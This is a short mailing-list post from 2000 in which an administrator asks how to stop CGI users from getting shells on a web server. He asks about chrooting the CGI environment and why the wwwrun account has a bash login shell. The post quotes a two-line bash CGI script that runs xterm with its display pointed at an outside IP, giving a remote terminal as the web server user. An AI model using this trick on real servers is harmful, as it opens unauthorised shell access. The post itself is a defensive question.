23 Jan
2000
23 Jan
'00
15:07
Hallo, When a user that has cgi-Access writes a cgi that looks like this: --------------schnipp-------------- #!/bin/bash # xterm -display 123.45.67.89 --------------schnapp-------------- ... (and inserts his own IP of course) he gets an xterm on his screen running as wwwrun. So what can I do about this? One good thing would be chrooting the cgi-environment. How can this be done? Are there howtos or manuals about this? Another thing is: Why is wwwrun having /bin/bash as shell and not /bin/false? What does it need a shell for? Ciao, Gerhard